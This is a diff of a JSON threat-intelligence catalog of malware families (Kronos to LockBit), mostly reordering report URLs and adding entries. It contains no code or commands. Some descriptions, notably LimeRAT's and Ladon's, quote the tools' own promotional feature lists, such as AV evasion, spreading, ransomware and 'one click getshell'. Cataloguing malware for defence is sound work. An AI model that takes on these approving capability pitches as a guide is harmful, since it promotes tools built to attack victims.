+ "https://twitter.com/3xp0rtblog/status/1294157781415743488",
+ "https://securityintelligence.com/the-father-of-zeus-kronos-malware-discovered/"
],
"synonyms": [
"Osiris"
@@ -29113,8 +30669,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ksl0t",
- "https://0ffset.wordpress.com/2018/10/05/post-0x17-2-turla-keylogger/",
"https://0ffset.net/reverse-engineering/malware-analysis/analyzing-turlas-keylogger-1/",
+ "https://0ffset.wordpress.com/2018/10/05/post-0x17-2-turla-keylogger/",
"https://0ffset.net/reverse-engineering/malware-analysis/analyzing-turlas-keylogger-2/"
],
"synonyms": [],
@@ -29161,15 +30717,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "616c7c32-110e-4bb3-8e99-4c2aeb8f8272",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "1fc49b8c-647a-4484-a2f6-e6f2311f8b58",
"value": "Kurton"
},
@@ -29191,41 +30738,46 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.kwampirs",
- "https://www.zdnet.com/article/fbi-re-sends-alert-about-supply-chain-attacks-for-the-third-time-in-three-months/",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
- "https://www.atlanticcouncil.org/wp-content/uploads/2020/07/Breaking-trust-Shades-of-crisis-across-an-insecure-software-supply-chain.pdf",
- "https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia",
"https://resources.cylera.com/new-evidence-linking-kwampirs-malware-to-shamoon-apts",
"https://blog.reversinglabs.com/blog/unpacking-kwampirs-rat",
- "https://resources.cylera.com/hubfs/Cylera%20Labs/Cylera%20Labs%20Kwampirs%20Shamoon%20Technical%20Report.pdf",
"http://www.documentcloud.org/documents/6821581-FLASH-CP-000111-MW-Downgraded-Version.html",
+ "https://resources.cylera.com/hubfs/Cylera%20Labs/Cylera%20Labs%20Kwampirs%20Shamoon%20Technical%20Report.pdf",
+ "https://thehackernews.com/2022/03/researchers-find-new-evidence-linking.html",
"https://www.securityartwork.es/2019/03/13/orangeworm-group-kwampirs-analysis-update/",
- "https://www.zdnet.com/article/fbi-warns-about-ongoing-attacks-against-software-supply-chain-companies/",
- "https://thehackernews.com/2022/03/researchers-find-new-evidence-linking.html"
+ "https://www.atlanticcouncil.org/wp-content/uploads/2020/07/Breaking-trust-Shades-of-crisis-across-an-insecure-software-supply-chain.pdf",
+ "https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
+ "https://www.zdnet.com/article/fbi-re-sends-alert-about-supply-chain-attacks-for-the-third-time-in-three-months/",
+ "https://www.zdnet.com/article/fbi-warns-about-ongoing-attacks-against-software-supply-chain-companies/"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "d1e548b8-4793-11e8-8dea-6beff82cac0a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "2fc93875-eebb-41ff-a66e-84471c6cd5a3",
"value": "Kwampirs"
},
+ {
+ "description": "According to its self-description, Ladon is a multi-threaded plug-in comprehensive scanning artifact for large-scale network penetration, including port scanning, service identification, network assets, password blasting, high-risk vulnerability detection and one click getshell. It supports batch a segment / b segment / C segment and cross network segment scanning, as well as URL, host and domain name list scanning.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ladon",
+ "https://github.com/k8gege/Ladon",
+ "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "5c63623b-aa84-41a5-9e3e-f338edf72291",
+ "value": "Ladon"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.lalala_stealer",
- "https://securitynews.sonicwall.com/xmlpost/lalala-infostealer-which-comes-with-batch-and-powershell-scripting-combo/",
"https://blog.prevailion.com/2020/03/the-curious-case-of-criminal-curriculum.html",
"https://twitter.com/luc4m/status/1276477397102145538",
+ "https://securitynews.sonicwall.com/xmlpost/lalala-infostealer-which-comes-with-batch-and-powershell-scripting-combo/",
"https://www.hornetsecurity.com/en/security-information/information-stealer-campaign-targeting-german-hr-contacts/"
],
"synonyms": [],
@@ -29239,13 +30791,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.lambert",
- "https://www.youtube.com/watch?v=jeLd-gw2bWo",
"https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=7ca2e331-2209-46a8-9e60-4cb83f9602de&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments",
- "https://www.symantec.com/connect/blogs/longhorn-tools-used-cyberespionage-group-linked-vault-7",
- "https://securelist.com/blog/research/77990/unraveling-the-lamberts-toolkit/",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://ti.qianxin.com/blog/articles/network-weapons-of-cia/",
"https://twitter.com/_CPResearch_/status/1484502090068242433",
- "https://ti.qianxin.com/blog/articles/network-weapons-of-cia/"
+ "https://www.symantec.com/connect/blogs/longhorn-tools-used-cyberespionage-group-linked-vault-7",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://www.youtube.com/watch?v=jeLd-gw2bWo",
+ "https://securelist.com/blog/research/77990/unraveling-the-lamberts-toolkit/"
],
"synonyms": [
"Plexor"
@@ -29268,29 +30820,34 @@
"uuid": "da79cf10-df9f-4cd3-bbce-ae9f357633f0",
"value": "Lamdelin"
},
+ {
+ "description": "Clipboard stealer.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.laplas",
+ "https://twitter.com/Gi7w0rm/status/1604999633792647169",
+ "https://blog.cyble.com/2022/11/02/new-laplas-clipper-distributed-by-smokeloader/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "cc2c0c2a-b233-4d51-9e0a-ae91043c952c",
+ "value": "LaplasClipper"
+ },
{
"description": "FireEye describes this malware as a highly obfuscated bot that has been in the wild since mid-2013. It has managed to leave hardly any traces on the Internet, is capable of watching its victims without ever being noticed, and can even corrupt a hard disk, thus making a PC useless.\r\n\r\nUsing Dynamic Threat Intelligence, they have observed multiple campaigns targeting multiple industries in the United States, United Kingdom, South Korea, Brazil, United Arab Emirates, Singapore, Canada, Peru and Poland – primarily in the financial services and insurance sectors. Although the infection strategy is not new, the final payload dropped – which they named LATENTBOT – caught attention since it implements several layers of obfuscation, a unique exfiltration mechanism, and has been very successful at infecting multiple organizations.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.latentbot",
"https://www.cert.pl/news/single/latentbot-modularny-i-silnie-zaciemniony-bot/",
- "http://malware-traffic-analysis.net/2017/04/25/index.html",
+ "https://cys-centrum.com/ru/news/module_trojan_for_unauthorized_access",
"https://www.fireeye.com/blog/threat-research/2015/12/latentbot_trace_me.html",
- "https://blog.malwarebytes.com/threat-analysis/2017/06/latentbot/",
- "https://cys-centrum.com/ru/news/module_trojan_for_unauthorized_access"
+ "http://malware-traffic-analysis.net/2017/04/25/index.html",
+ "https://blog.malwarebytes.com/threat-analysis/2017/06/latentbot/"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "635d260f-39d9-4d3f-99ec-d2560cb5d694",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "7fc74551-013f-4dd1-8da9-9266edcc45d0",
"value": "LatentBot"
},
@@ -29307,14 +30864,56 @@
"uuid": "e1958a69-49c3-43a2-ba80-6e5cd5bbcd13",
"value": "Laturo Stealer"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lazardoor",
+ "https://asec.ahnlab.com/ko/40495/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "1045b4f1-5a85-4448-a7a9-abc964bdae72",
+ "value": "LazarDoor"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lazarloader",
+ "https://securelist.com/bluenoroff-methods-bypass-motw/108383/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "42bce8d3-8705-44fb-bd88-4af16c6bd28f",
+ "value": "LazarLoader"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lazarus_killdisk",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/new-killdisk-variant-hits-financial-organizations-in-latin-america/",
+ "https://www.welivesecurity.com/2018/04/03/lazarus-killdisk-central-american-casino/"
+ ],
+ "synonyms": [
+ "KillDisk.NBO"
+ ],
+ "type": []
+ },
+ "uuid": "6f377d0b-9eaa-474c-8cf8-0718ee2b0efc",
+ "value": "KillDisk (Lazarus)"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.laziok",
"https://www.symantec.com/connect/blogs/new-reconnaissance-threat-trojanlaziok-targets-energy-sector",
- "https://www.mysonicwall.com/sonicalert/searchresults.aspx?ev=article&id=802",
- "https://www.gdatasoftware.com/blog/2015/05/24280-dissecting-the-kraken"
+ "https://www.gdatasoftware.com/blog/2015/05/24280-dissecting-the-kraken",
+ "https://www.mysonicwall.com/sonicalert/searchresults.aspx?ev=article&id=802"
],
"synonyms": [],
"type": []
@@ -29341,10 +30940,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.lcpdot",
- "https://securelist.com/lazarus-trojanized-defi-app/106195/",
+ "https://research.nccgroup.com/2022/05/05/north-koreas-lazarus-and-their-initial-access-trade-craft-using-social-media-and-social-engineering/",
"https://blogs.jpcert.or.jp/en/2021/01/Lazarus_malware2.html",
- "https://global.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.102_ENG%20(4).pdf",
- "https://research.nccgroup.com/2022/05/05/north-koreas-lazarus-and-their-initial-access-trade-craft-using-social-media-and-social-engineering/"
+ "https://securelist.com/lazarus-trojanized-defi-app/106195/",
+ "https://global.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.102_ENG%20(4).pdf"
],
"synonyms": [],
"type": []
@@ -29352,6 +30951,19 @@
"uuid": "23dd327e-5d1d-4b75-993e-5d79d9fc0a70",
"value": "LCPDot"
},
+ {
+ "description": "A further branch of the URSNIF collection of malware families. According to Mandiant, it no longer has focus on banking fraud but generic backdoor capabilities instead.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ldr4",
+ "https://www.mandiant.com/resources/blog/rm3-ldr4-ursnif-banking-fraud"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "c429622f-cbdf-47d6-88e8-091283ed5703",
+ "value": "LDR4"
+ },
{
"description": "Ransomware.",
"meta": {
@@ -29384,19 +30996,19 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.lemonduck",
"https://therecord.media/lemonduck-botnet-evolves-to-allow-hands-on-keyboard-intrusions/",
- "https://notes.netbytesec.com/2021/06/lemon-duck-cryptominer-technical.html",
- "https://news.sophos.com/en-us/2021/05/07/new-lemon-duck-variants-exploiting-microsoft-exchange-server/?cmp=30728",
- "https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/",
- "https://www.bitdefender.com/files/News/CaseStudies/study/373/Bitdefender-PR-Whitepaper-LemonDuck-creat4826-en-EN-GenericUse.pdf",
- "https://www.bleepingcomputer.com/news/security/vulnerable-microsoft-sql-servers-targeted-with-cobalt-strike/",
"https://cybotsai.com/lemon-duck-attack/",
"https://www.crowdstrike.com/blog/lemonduck-botnet-targets-docker-for-cryptomining-operations/",
- "https://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html",
- "https://news.sophos.com/en-us/2019/10/01/lemon_duck-powershell-malware-cryptojacks-enterprise-networks/",
- "https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/",
- "https://success.trendmicro.com/solution/000261916",
"https://www.trendmicro.com/en_us/research/21/e/proxylogon-a-coinminer--a-ransomware--and-a-botnet-join-the-part.html",
- "https://asec.ahnlab.com/en/31811/"
+ "https://news.sophos.com/en-us/2021/05/07/new-lemon-duck-variants-exploiting-microsoft-exchange-server/?cmp=30728",
+ "https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/",
+ "https://news.sophos.com/en-us/2019/10/01/lemon_duck-powershell-malware-cryptojacks-enterprise-networks/",
+ "https://asec.ahnlab.com/en/31811/",
+ "https://www.bleepingcomputer.com/news/security/vulnerable-microsoft-sql-servers-targeted-with-cobalt-strike/",
+ "https://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html",
+ "https://notes.netbytesec.com/2021/06/lemon-duck-cryptominer-technical.html",
+ "https://www.bitdefender.com/files/News/CaseStudies/study/373/Bitdefender-PR-Whitepaper-LemonDuck-creat4826-en-EN-GenericUse.pdf",
+ "https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/",
+ "https://success.trendmicro.com/solution/000261916"
],
"synonyms": [],
"type": []
@@ -29425,9 +31037,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.lethic",
+ "http://www.vkremez.com/2017/11/lets-learn-lethic-spambot-survey-of.html",
"http://www.malware-traffic-analysis.net/2017/11/02/index.html",
- "http://resources.infosecinstitute.com/win32lethic-botnet-analysis/",
- "http://www.vkremez.com/2017/11/lets-learn-lethic-spambot-survey-of.html"
+ "http://resources.infosecinstitute.com/win32lethic-botnet-analysis/"
],
"synonyms": [],
"type": []
@@ -29448,15 +31060,28 @@
"uuid": "007697bc-463e-4f90-93e3-8f8fdeff147a",
"value": "LetMeOut"
},
+ {
+ "description": "LgoogLoader is an installer that drops three files: a batch file, an AutoIt interpreter, and an AutoIt script. After downloading, it executes the batch file.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lgoogloader",
+ "https://blog.polyswarm.io/nullmixer-drops-multiple-malware-families"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "edf1bb94-cc6b-46fd-a922-18fd2a0f323f",
+ "value": "LgoogLoader"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.liderc",
"https://go.recordedfuture.com/hubfs/reports/cta-2022-0330.pdf",
+ "https://www.proofpoint.com/us/blog/threat-insight/i-knew-you-were-trouble-ta456-targets-defense-contractor-alluring-social-media",
"https://blog.talosintelligence.com/2019/09/tortoiseshell-fake-veterans.html",
- "https://about.fb.com/news/2021/07/taking-action-against-hackers-in-iran/",
- "https://www.proofpoint.com/us/blog/threat-insight/i-knew-you-were-trouble-ta456-targets-defense-contractor-alluring-social-media"
+ "https://about.fb.com/news/2021/07/taking-action-against-hackers-in-iran/"
],
"synonyms": [
"LEMPO"
@@ -29466,19 +31091,32 @@
"uuid": "ed825d46-be1e-4d36-b828-1b85274773dd",
"value": "Liderc"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lightbunny",
+ "https://www.mandiant.com/resources/blog/unc961-multiverse-financially-motivated"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "ea790924-8a81-4141-9e5c-14a205af170f",
+ "value": "LIGHTBUNNY"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.lightneuron",
- "https://securelist.com/apt-trends-report-q2-2018/86487/",
- "https://www.welivesecurity.com/2020/03/12/tracking-turla-new-backdoor-armenian-watering-holes/",
- "https://www.symantec.com/blogs/threat-intelligence/waterbug-espionage-governments",
- "https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf",
"https://www.secureworks.com/research/threat-profiles/iron-hunter",
+ "https://securelist.com/apt-trends-report-q2-2018/86487/",
"https://www.welivesecurity.com/2019/05/07/turla-lightneuron-email-too-far/",
"https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf"
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://www.symantec.com/blogs/threat-intelligence/waterbug-espionage-governments",
+ "https://www.welivesecurity.com/2020/03/12/tracking-turla-new-backdoor-armenian-watering-holes/",
+ "https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf"
],
"synonyms": [
"NETTRANS",
@@ -29521,15 +31159,16 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.lilith",
- "https://www.trendmicro.com/en_us/research/21/l/collecting-in-the-dark-tropic-trooper-targets-transportation-and-government-organizations.html",
- "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf?1625657388",
- "https://yoroi.company/research/a-deep-dive-into-eternity-group-a-new-emerging-cyber-threat/",
- "https://blog.cyble.com/2022/07/12/new-ransomware-groups-on-the-rise/",
- "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/594/original/Network_IOCs_list_for_coverage.txt?1625657479",
- "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/592/original/Hashes_IOCs_for_coverage.txt",
"https://blog.trendmicro.com/trendlabs-security-intelligence/operation-endtrade-finding-multi-stage-backdoors-that-tick/",
+ "https://yoroi.company/research/a-deep-dive-into-eternity-group-a-new-emerging-cyber-threat/",
"https://github.com/werkamsus/Lilith",
- "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf"
+ "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf",
+ "https://www.trendmicro.com/en_us/research/21/l/collecting-in-the-dark-tropic-trooper-targets-transportation-and-government-organizations.html",
+ "https://www.zscaler.com/blogs/security-research/analysis-lilithbot-malware-and-eternity-threat-group",
+ "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf?1625657388",
+ "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/592/original/Hashes_IOCs_for_coverage.txt",
+ "https://blog.cyble.com/2022/07/12/new-ransomware-groups-on-the-rise/",
+ "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/594/original/Network_IOCs_list_for_coverage.txt?1625657479"
],
"synonyms": [],
"type": []
@@ -29563,26 +31202,41 @@
"uuid": "3819bc21-8c15-48ee-8e68-ee2a0c5f82a7",
"value": "limeminer"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.limepad",
+ "https://www.zscaler.com/blogs/security-research/apt-36-uses-new-ttps-and-new-tools-target-indian-governmental-organizations"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "0cae4bcd-9656-434d-81c1-c55801b3eaa3",
+ "value": "LimePad"
+ },
{
"description": " ## Description\r\n Simple yet powerful RAT for Windows machines. This project is simple and easy to understand, It should give you a general knowledge about dotNET malwares and how it behaves. \r\n \r\n ---\r\n\r\n## Main Features\r\n\r\n- **.NET**\r\n - Coded in Visual Basic .NET, Client required framework 2.0 or 4.0 dependency, And server is 4.0\r\n- **Connection**\r\n - Using pastebin.com as ip:port , Instead of noip.com DNS. And Also using multi-ports\r\n- **Plugin**\r\n - Using plugin system to decrease stub's size and lower the AV detection\r\n- **Encryption**\r\n - The communication between server & client is encrypted with AES\r\n- **Spreading**\r\n - Infecting all files and folders on USB drivers\r\n- **Bypass**\r\n - Low AV detection and undetected startup method\r\n- **Lightweight**\r\n - Payload size is about 25 KB\r\n- **Anti Virtual Machines**\r\n - Uninstall itself if the machine is virtual to avoid scanning or analyzing \r\n- **Ransomware**\r\n - Encrypting files on all HHD and USB with .Lime extension\r\n- **XMR Miner**\r\n - High performance Monero CPU miner with user idle\\active optimizations\r\n- **DDoS**\r\n - Creating a powerful DDOS attack to make an online service unavailable\r\n- **Crypto Stealer**\r\n - Stealing Cryptocurrency sensitive data\r\n- **Screen-Locker**\r\n - Prevents user from accessing their Windows GUI \r\n - **And more**\r\n - On Connect Auto Task\r\n\t- Force enable Windows RDP\r\n\t- Persistence\r\n - File manager\r\n - Passowrds stealer\r\n - Remote desktop\r\n - Bitcoin grabber\r\n - Downloader\r\n - Keylogger",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.limerat",
- "https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html",
- "https://blogs.juniper.net/en-us/threat-research/new-pastebin-like-service-used-in-multiple-malware-campaigns",
- "https://github.com/NYAN-x-CAT/Lime-RAT/",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/targeted-attack-on-government-agencies.html",
- "https://lab52.io/blog/literature-lover-targeting-colombia-with-limerat/",
- "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf",
- "https://lab52.io/blog/apt-c-36-recent-activity-analysis/",
"https://blog.talosintelligence.com/2022/04/asyncrat-3losh-update.html",
"https://blog.reversinglabs.com/blog/rats-in-the-library",
- "https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html",
- "https://www.youtube.com/watch?v=x-g-ZLeX8GM",
+ "https://any.run/cybersecurity-blog/limerat-malware-analysis/",
+ "https://lab52.io/blog/apt-c-36-recent-activity-analysis/",
"https://blog.morphisec.com/tracking-hcrypt-an-active-crypter-as-a-service",
+ "https://www.youtube.com/watch?v=x-g-ZLeX8GM",
+ "https://github.com/NYAN-x-CAT/Lime-RAT/",
+ "https://blogs.juniper.net/en-us/threat-research/new-pastebin-like-service-used-in-multiple-malware-campaigns",
+ "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf",
+ "https://lab52.io/blog/literature-lover-targeting-colombia-with-limerat/",
"https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
"https://blog.yoroi.company/research/limerat-spreads-in-the-wild/",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt"
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt",
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/targeted-attack-on-government-agencies.html",
+ "https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html",
+ "https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html",
+ "https://felipetarijon.github.io/2022-12-12-limerat-infecting-unskilled-threat-actors/"
],
"synonyms": [],
"type": []
@@ -29620,8 +31274,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.listrix",
- "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks",
- "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group"
+ "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group",
+ "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks"
],
"synonyms": [],
"type": []
@@ -29648,9 +31302,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.litehttp",
- "https://viriback.com/recent-litehttp-activities-and-iocs/",
+ "https://malware.news/t/recent-litehttp-activities-and-iocs/21053",
"https://github.com/zettabithf/LiteHTTP",
- "https://malware.news/t/recent-litehttp-activities-and-iocs/21053"
+ "https://viriback.com/recent-litehttp-activities-and-iocs/"
],
"synonyms": [],
"type": []
@@ -29658,121 +31312,152 @@
"uuid": "2f9e1221-0a59-447b-a9e8-bedb010cd3d8",
"value": "LiteHTTP"
},
+ {
+ "description": "According to PCrisk, LOBSHOT is a type of malware with a feature called hVNC (Hidden Virtual Network Computing) that allows attackers to access a victim's computer without being noticed. The hVNC component is effective in evading fraud detection systems. Also, LOBSHOT is being used to carry out financial crimes through the use of banking trojan and information-stealing functionalities.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lobshot",
+ "https://www.elastic.co/de/security-labs/elastic-security-labs-discovers-lobshot-malware"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "c30db30e-e29a-4f62-bda0-c284fa7c6f6d",
+ "value": "LOBSHOT"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.lockbit",
- "https://www.ic3.gov/Media/News/2022/220204.pdf",
- "https://cluster25.io/2022/07/06/lockbit-3-0-making-the-ransomware-great-again/",
- "https://www.netskope.com/blog/netskope-threat-coverage-lockbit",
- "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html",
- "https://www.bleepingcomputer.com/news/security/blackmatter-ransomware-moves-victims-to-lockbit-after-shutdown/",
- "https://therecord.media/missed-opportunity-bug-in-lockbit-ransomware-allowed-free-decryptions/",
- "https://id-ransomware.blogspot.com/search?q=lockbit",
- "https://medium.com/s2wlab/w4-july-en-story-of-the-week-ransomware-on-the-darkweb-c61965d0386a",
- "https://www.bleepingcomputer.com/news/security/popular-russian-hacking-forum-xss-bans-all-ransomware-topics/",
- "https://www.trendmicro.com/en_us/research/22/g/lockbit-ransomware-group-augments-its-latest-variant--lockbit-3-.html",
- "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound",
- "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
- "https://www.dragos.com/blog/industry-news/dragos-ics-ot-ransomware-analysis-q4-2021/",
- "https://lifars.com/wp-content/uploads/2022/02/LockBitRansomware_Whitepaper.pdf",
- "https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-blackmatter-lockbit-thor",
"https://www.intrinsec.com/alphv-ransomware-gang-analysis",
- "https://www.trendmicro.com/en_us/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html",
- "https://blog.cyble.com/2022/07/05/lockbit-3-0-ransomware-group-launches-new-version/",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://www.advanced-intel.com/post/from-russia-with-lockbit-ransomware-inside-look-preventive-solutions",
+ "https://asec.ahnlab.com/en/35822/",
+ "https://chuongdong.com/reverse%20engineering/2022/03/19/LockbitRansomware/",
+ "https://www.trendmicro.com/en_no/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html",
+ "https://securityscorecard.com/research/the-increase-in-ransomware-attacks-on-local-governments",
+ "https://id-ransomware.blogspot.com/search?q=lockbit",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockbit-targets-servers",
+ "https://asec.ahnlab.com/en/41450/",
+ "https://www.bleepingcomputer.com/news/security/ransomware-attack-hits-italys-lazio-region-affects-covid-19-site/",
+ "https://www.cybereason.com/blog/rising-threat-from-lockbit-ransomware",
+ "https://blog.minerva-labs.com/lockbit-3.0-aka-lockbit-black-is-here-with-a-new-icon-new-ransom-note-new-wallpaper-but-less-evasiveness",
+ "https://www.sentinelone.com/labs/lockbit-3-0-update-unpicking-the-ransomwares-latest-anti-analysis-and-evasion-techniques/",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
+ "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023",
+ "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
+ "https://www.coveware.com/blog/2022/1/26/ransomware-as-a-service-innovation-curve",
+ "https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-blackmatter-lockbit-thor",
+ "https://twitter.com/MsftSecIntel/status/1522690116979855360",
+ "https://blogs.vmware.com/security/2022/10/lockbit-3-0-also-known-as-lockbit-black.html",
+ "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound",
+ "https://cluster25.io/2022/07/06/lockbit-3-0-making-the-ransomware-great-again/",
+ "https://www.bleepingcomputer.com/news/security/blackmatter-ransomware-moves-victims-to-lockbit-after-shutdown/",
+ "https://blog.morphisec.com/the-babadeda-crypter-targeting-crypto-nft-defi-communities",
